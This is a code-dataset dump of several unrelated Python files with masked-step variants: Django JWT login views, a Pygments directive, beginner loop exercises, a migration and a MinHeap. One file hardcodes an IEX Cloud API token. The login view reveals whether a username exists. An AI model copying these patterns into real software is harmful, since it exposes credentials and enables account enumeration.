refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))
refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)
return token, refresh_token
def post(self, request):
username = request.data.get("username")
password = request.data.get("password")
try:
user = User.objects.get(username=username)
except User.DoesNotExist as e:
return StatusResponse(http_code=400,data={"tip": "用户不存在"})
if user is not None and user.check_password(password):
token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)
data = {
"token": token,
"refresh_token": refresh_token,
"id": user.id,
"username": user.username
}
response = StatusResponse(data=data, http_code=201)
return response
return StatusResponse(http_code=400,data={"tip":"登录失败"})
def put(self,request):
if request.user_id and request.refresh:
token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)
data ={
"id":request.user_id,
"token":token
}
response = StatusResponse(data=data, http_code=201)
return response
else:
return StatusResponse(http_code=401, data={"tip": "token刷新失败"})
class UserRegistView(GenericAPIView):
serializer_class = UserSerializer
def post(self, request):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
return StatusResponse(http_code=200,data=serializer.data)
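# Illustrative request flow for the three views above (URL paths are an
# assumption -- the project's urls.py is not part of this snippet):
#   GET  <users-url>   (valid token required)        -> wrapped list of active non-superuser users
#   POST <login-url>   {"username": ..., "pwd": ...} -> 201 {token, refresh_token, id, username}
#   PUT  <login-url>   (valid refresh token)         -> 201 {id, token}
#   POST <regist-url>  serialized User fields        -> 200 serialized user data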
|
normal
|
{
"blob_id": "0457ac2ecd0a951b0088c887539ab696797d68bc",
"index": 4557,
"step-1": "<mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-2": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-3": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-4": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n \"\"\"\n list:\n 返回用户列表\n \"\"\"\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-5": "import os\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom django.shortcuts import render\r\nfrom django.utils.decorators import method_decorator\r\nfrom rest_framework.viewsets import GenericViewSet, mixins\r\n\r\nfrom common.jwt_util import generate_jwt\r\nfrom .serializers import ApiUser, ApiUserSerializer, UserSerializer\r\nfrom common.myresponse import StatusResponse\r\nfrom rest_framework.generics import GenericAPIView\r\nfrom .models import User\r\nfrom common.utils.login_util import login_decorator\r\n\r\n\r\n# Create your views here.\r\n\r\n@method_decorator(login_decorator,name=\"list\")\r\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\r\n \"\"\"\r\n list:\r\n 返回用户列表\r\n \"\"\"\r\n serializer_class = ApiUserSerializer\r\n queryset = User.objects.filter(is_superuser=0,is_active=1).all()\r\n\r\n def list(self, request, *args, **kwargs):\r\n return StatusResponse(data=super().list(request).data)\r\n\r\n\r\n\r\nclass UserLoginView(GenericAPIView):\r\n def _generate_tokens(self, user_id, with_refresh_token=True):\r\n \"\"\"\r\n 生成token 和refresh_token\r\n :param user_id: 用户id\r\n :return: token, refresh_token\r\n \"\"\"\r\n # 颁发JWT\r\n now = datetime.utcnow()\r\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\r\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\r\n\r\n refresh_token = None\r\n if with_refresh_token:\r\n refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))\r\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)\r\n return token, refresh_token\r\n\r\n def post(self, request):\r\n\r\n username = request.data.get(\"username\")\r\n password = request.data.get(\"password\")\r\n try:\r\n user = User.objects.get(username=username)\r\n except User.DoesNotExist as e:\r\n return StatusResponse(http_code=400,data={\"tip\": \"用户不存在\"})\r\n\r\n if user is not None and user.check_password(password):\r\n token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)\r\n data = {\r\n \"token\": token,\r\n \"refresh_token\": refresh_token,\r\n \"id\": user.id,\r\n \"username\": user.username\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n return StatusResponse(http_code=400,data={\"tip\":\"登录失败\"})\r\n def put(self,request):\r\n if request.user_id and request.refresh:\r\n token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)\r\n data ={\r\n \"id\":request.user_id,\r\n \"token\":token\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n else:\r\n return StatusResponse(http_code=401, data={\"tip\": \"token刷新失败\"})\r\n\r\nclass UserRegistView(GenericAPIView):\r\n serializer_class = UserSerializer\r\n def post(self, request):\r\n serializer = self.get_serializer(data=request.data)\r\n serializer.is_valid(raise_exception=True)\r\n serializer.save()\r\n return StatusResponse(http_code=200,data=serializer.data)\r\n",
"step-ids": [
7,
8,
10,
11,
13
]
}
|
[
7,
8,
10,
11,
13
] |
from docutils import nodes
from docutils.parsers.rst import directives, Directive
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.lexers.special import TextLexer
from pygments.formatters.html import HtmlFormatter
class Pygments(Directive):
""" Source code syntax hightlighting.
"""
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {
'anchorlinenos': directives.flag,
'classprefix': directives.unchanged,
'hl_lines': directives.unchanged,
'lineanchors': directives.unchanged,
'linenos': directives.unchanged,
'linenospecial': directives.nonnegative_int,
'linenostart': directives.nonnegative_int,
'linenostep': directives.nonnegative_int,
'lineseparator': directives.unchanged,
'linespans': directives.unchanged,
'nobackground': directives.flag,
'nowrap': directives.flag,
'tagsfile': directives.unchanged,
'tagurlformat': directives.unchanged,
}
has_content = True
def run(self):
self.assert_has_content()
try:
lexer = get_lexer_by_name(self.arguments[0])
except ValueError:
# no lexer found - use the text one instead of an exception
lexer = TextLexer()
if 'linenos' in self.options and self.options['linenos'] not in ('table', 'inline'):
if self.options['linenos'] == 'none':
self.options.pop('linenos')
else:
self.options['linenos'] = 'table'
for flag in ('nowrap', 'nobackground', 'anchorlinenos'):
if flag in self.options:
self.options[flag] = True
# noclasses should already default to False, but just in case...
formatter = HtmlFormatter(noclasses=False, **self.options)
parsed = highlight('\n'.join(self.content), lexer, formatter)
return [nodes.raw('', parsed, format='html')]
def register():
directives.register_directive('code-block', Pygments)
directives.register_directive('sourcecode', Pygments)
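# Example reStructuredText input that this directive handles once register()
# has been called (the snippet itself is illustrative; the option names come
# from option_spec above):
#
#   .. code-block:: python
#      :linenos: table
#
#      print("highlighted with Pygments")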
|
normal
|
{
"blob_id": "d3dcef6a1a6bcfc1161c4de46081703b8fe7016d",
"index": 9606,
"step-1": "<mask token>\n\n\nclass Pygments(Directive):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {'anchorlinenos': directives.flag, 'classprefix':\n directives.unchanged, 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged, 'linenos': directives.\n unchanged, 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int, 'linenostep': directives\n .nonnegative_int, 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged, 'nobackground': directives.flag,\n 'nowrap': directives.flag, 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged}\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {'anchorlinenos': directives.flag, 'classprefix':\n directives.unchanged, 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged, 'linenos': directives.\n unchanged, 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int, 'linenostep': directives\n .nonnegative_int, 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged, 'nobackground': directives.flag,\n 'nowrap': directives.flag, 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged}\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\ndef register():\n directives.register_directive('code-block', Pygments)\n directives.register_directive('sourcecode', Pygments)\n",
"step-4": "from docutils import nodes\nfrom docutils.parsers.rst import directives, Directive\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.lexers.special import TextLexer\nfrom pygments.formatters.html import HtmlFormatter\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {'anchorlinenos': directives.flag, 'classprefix':\n directives.unchanged, 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged, 'linenos': directives.\n unchanged, 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int, 'linenostep': directives\n .nonnegative_int, 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged, 'nobackground': directives.flag,\n 'nowrap': directives.flag, 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged}\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n lexer = TextLexer()\n if 'linenos' in self.options and self.options['linenos'] not in (\n 'table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\ndef register():\n directives.register_directive('code-block', Pygments)\n directives.register_directive('sourcecode', Pygments)\n",
"step-5": "from docutils import nodes\nfrom docutils.parsers.rst import directives, Directive\n\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.lexers.special import TextLexer\nfrom pygments.formatters.html import HtmlFormatter\n\n\nclass Pygments(Directive):\n \"\"\" Source code syntax hightlighting.\n \"\"\"\n required_arguments = 1\n optional_arguments = 0\n final_argument_whitespace = True\n option_spec = {\n 'anchorlinenos': directives.flag,\n 'classprefix': directives.unchanged,\n 'hl_lines': directives.unchanged,\n 'lineanchors': directives.unchanged,\n 'linenos': directives.unchanged,\n 'linenospecial': directives.nonnegative_int,\n 'linenostart': directives.nonnegative_int,\n 'linenostep': directives.nonnegative_int,\n 'lineseparator': directives.unchanged,\n 'linespans': directives.unchanged,\n 'nobackground': directives.flag,\n 'nowrap': directives.flag,\n 'tagsfile': directives.unchanged,\n 'tagurlformat': directives.unchanged,\n }\n has_content = True\n\n def run(self):\n self.assert_has_content()\n try:\n lexer = get_lexer_by_name(self.arguments[0])\n except ValueError:\n # no lexer found - use the text one instead of an exception\n lexer = TextLexer()\n\n if 'linenos' in self.options and self.options['linenos'] not in ('table', 'inline'):\n if self.options['linenos'] == 'none':\n self.options.pop('linenos')\n else:\n self.options['linenos'] = 'table'\n\n for flag in ('nowrap', 'nobackground', 'anchorlinenos'):\n if flag in self.options:\n self.options[flag] = True\n\n # noclasses should already default to False, but just in case...\n formatter = HtmlFormatter(noclasses=False, **self.options)\n parsed = highlight('\\n'.join(self.content), lexer, formatter)\n return [nodes.raw('', parsed, format='html')]\n\n\ndef register():\n directives.register_directive('code-block', Pygments)\n directives.register_directive('sourcecode', Pygments)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'
|
normal
|
{
"blob_id": "86849d0e63cdb93a16497ca56ff9c64c15a60fa7",
"index": 4891,
"step-1": "<mask token>\n",
"step-2": "IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#!/usr/bin/env python
# coding: utf-8
# In[2]:
print(" sum of n numbers with help of for loop. ")
n = 10
sum = 0
for num in range(0, n+1, 1):
sum = sum+num
print("Output: SUM of first ", n, "numbers is: ", sum )
# In[3]:
print(" sum of n numbers with help of while loop. ")
num = int(input("Enter the value of n: "))
hold = num
sum = 0
if num <= 0:
print("Enter a whole positive number!")
else:
while num > 0:
sum = sum + num
num = num - 1;
# displaying output
print("Sum of first", hold, "natural number is: ",sum)
# In[4]:
print("Take an integer and find whether the number is prime or not")
#input from user
number = int(input("Enter any number: "))
# prime number is always greater than 1
if number > 1:
for i in range(2, number):
if (number % i) == 0:
print(number, "is not a prime number")
break
else: print(number, "is a prime number")
# if the entered number is less than or equal to 1
# then it is not prime number
else: print(number, "is not a prime number")
# In[ ]:
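# Quick sanity check of the outputs above: for n = 10 the for-loop prints a
# sum of 55; in the prime test, 7 has no divisor in 2..6 so it is reported as
# prime, while 9 (divisible by 3) would be reported as not prime.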
|
normal
|
{
"blob_id": "d3c36ad36c50cd97f2101bc8df99d1961b0ad7ea",
"index": 4078,
"step-1": "<mask token>\n",
"step-2": "print(' sum of n numbers with help of for loop. ')\n<mask token>\nfor num in range(0, n + 1, 1):\n sum = sum + num\nprint('Output: SUM of first ', n, 'numbers is: ', sum)\nprint(' sum of n numbers with help of while loop. ')\n<mask token>\nif num <= 0:\n print('Enter a whole positive number!')\nelse:\n while num > 0:\n sum = sum + num\n num = num - 1\nprint('Sum of first', hold, 'natural number is: ', sum)\nprint('Take an integer and find whether the number is prime or not')\n<mask token>\nif number > 1:\n for i in range(2, number):\n if number % i == 0:\n print(number, 'is not a prime number')\n break\n else:\n print(number, 'is a prime number')\nelse:\n print(number, 'is not a prime number')\n",
"step-3": "print(' sum of n numbers with help of for loop. ')\nn = 10\nsum = 0\nfor num in range(0, n + 1, 1):\n sum = sum + num\nprint('Output: SUM of first ', n, 'numbers is: ', sum)\nprint(' sum of n numbers with help of while loop. ')\nnum = int(input('Enter the value of n: '))\nhold = num\nsum = 0\nif num <= 0:\n print('Enter a whole positive number!')\nelse:\n while num > 0:\n sum = sum + num\n num = num - 1\nprint('Sum of first', hold, 'natural number is: ', sum)\nprint('Take an integer and find whether the number is prime or not')\nnumber = int(input('Enter any number: '))\nif number > 1:\n for i in range(2, number):\n if number % i == 0:\n print(number, 'is not a prime number')\n break\n else:\n print(number, 'is a prime number')\nelse:\n print(number, 'is not a prime number')\n",
"step-4": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nprint(\" sum of n numbers with help of for loop. \")\nn = 10\nsum = 0\nfor num in range(0, n+1, 1):\n sum = sum+num\nprint(\"Output: SUM of first \", n, \"numbers is: \", sum )\n\n\n# In[3]:\n\n\nprint(\" sum of n numbers with help of while loop. \")\nnum = int(input(\"Enter the value of n: \"))\nhold = num \nsum = 0 \n\n\nif num <= 0: \n print(\"Enter a whole positive number!\") \nelse: \n while num > 0: \n sum = sum + num \n num = num - 1;\n # displaying output \nprint(\"Sum of first\", hold, \"natural number is: \",sum)\n\n\n# In[4]:\n\n\nprint(\"Take an integer and find whether the number is prime or not\")\n#input from user\nnumber = int(input(\"Enter any number: \")) \n# prime number is always greater than 1\nif number > 1: \n for i in range(2, number):\n if (number % i) == 0: \n print(number, \"is not a prime number\")\n break \n else: print(number, \"is a prime number\")\n # if the entered number is less than or equal to 1 \n # then it is not prime number \nelse: print(number, \"is not a prime number\")\n\n\n# In[ ]:\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.2.1 on 2019-05-23 14:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('presentes', '0015_caso_lugar_del_hecho'),
]
operations = [
migrations.AddField(
model_name='organizacion',
name='descripcion',
field=models.TextField(default=''),
),
migrations.AddField(
model_name='organizacion',
name='email',
field=models.CharField(default='', max_length=200),
),
]
|
normal
|
{
"blob_id": "5cd767564e8a261561e141abeebb5221cb3ef2c2",
"index": 6919,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('presentes', '0015_caso_lugar_del_hecho')]\n operations = [migrations.AddField(model_name='organizacion', name=\n 'descripcion', field=models.TextField(default='')), migrations.\n AddField(model_name='organizacion', name='email', field=models.\n CharField(default='', max_length=200))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('presentes', '0015_caso_lugar_del_hecho')]\n operations = [migrations.AddField(model_name='organizacion', name=\n 'descripcion', field=models.TextField(default='')), migrations.\n AddField(model_name='organizacion', name='email', field=models.\n CharField(default='', max_length=200))]\n",
"step-5": "# Generated by Django 2.2.1 on 2019-05-23 14:07\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('presentes', '0015_caso_lugar_del_hecho'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='organizacion',\n name='descripcion',\n field=models.TextField(default=''),\n ),\n migrations.AddField(\n model_name='organizacion',\n name='email',\n field=models.CharField(default='', max_length=200),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class MinHeap:
    def __init__(self):
        # index 0 is an unused sentinel so the heap is 1-indexed; keep the
        # list per instance rather than as a shared class attribute
        self.__heap = [0]
def insert(self, value):
self.__heap.append(value)
self.__sift_up()
def pop(self):
if len(self.__heap) == 1:
return None
minimum = self.__heap[1]
if len(self.__heap) == 2:
self.__heap.pop()
else:
self.__heap[1] = self.__heap.pop()
self.__sift_down()
return minimum
def __sift_up(self):
idx = len(self.__heap) - 1
parent = idx >> 1
while idx > 1 and self.__heap[idx] < self.__heap[parent]:
tmp = self.__heap[idx]
self.__heap[idx] = self.__heap[parent]
self.__heap[parent] = tmp
idx = parent
parent = idx >> 1
def __sift_down(self):
idx = 1
size = len(self.__heap)
while idx < size:
minimum = self.__heap[idx]
left = idx << 1
right = left + 1
swap = None
if left < size and self.__heap[left] < minimum:
minimum = self.__heap[left]
swap = left
if right < size and self.__heap[right] < minimum:
swap = right
if swap is None:
break
tmp = self.__heap[swap]
self.__heap[swap] = self.__heap[idx]
self.__heap[idx] = tmp
idx = swap
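# Minimal usage sketch (not part of the original snippet): values come back
# out in ascending order.
if __name__ == "__main__":
    heap = MinHeap()
    for value in (5, 1, 4, 2, 3):
        heap.insert(value)
    print([heap.pop() for _ in range(5)])  # -> [1, 2, 3, 4, 5]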
|
normal
|
{
"blob_id": "d412e5768b23b8bbb8f72e2ae204650bbc1f0550",
"index": 8979,
"step-1": "class MinHeap:\n <mask token>\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n <mask token>\n <mask token>\n",
"step-2": "class MinHeap:\n <mask token>\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n <mask token>\n\n def __sift_down(self):\n idx = 1\n size = len(self.__heap)\n while idx < size:\n minimum = self.__heap[idx]\n left = idx << 1\n right = left + 1\n swap = None\n if left < size and self.__heap[left] < minimum:\n minimum = self.__heap[left]\n swap = left\n if right < size and self.__heap[right] < minimum:\n swap = right\n if swap is None:\n break\n tmp = self.__heap[swap]\n self.__heap[swap] = self.__heap[idx]\n self.__heap[idx] = tmp\n idx = swap\n",
"step-3": "class MinHeap:\n <mask token>\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n\n def __sift_up(self):\n idx = len(self.__heap) - 1\n parent = idx >> 1\n while idx > 1 and self.__heap[idx] < self.__heap[parent]:\n tmp = self.__heap[idx]\n self.__heap[idx] = self.__heap[parent]\n self.__heap[parent] = tmp\n idx = parent\n parent = idx >> 1\n\n def __sift_down(self):\n idx = 1\n size = len(self.__heap)\n while idx < size:\n minimum = self.__heap[idx]\n left = idx << 1\n right = left + 1\n swap = None\n if left < size and self.__heap[left] < minimum:\n minimum = self.__heap[left]\n swap = left\n if right < size and self.__heap[right] < minimum:\n swap = right\n if swap is None:\n break\n tmp = self.__heap[swap]\n self.__heap[swap] = self.__heap[idx]\n self.__heap[idx] = tmp\n idx = swap\n",
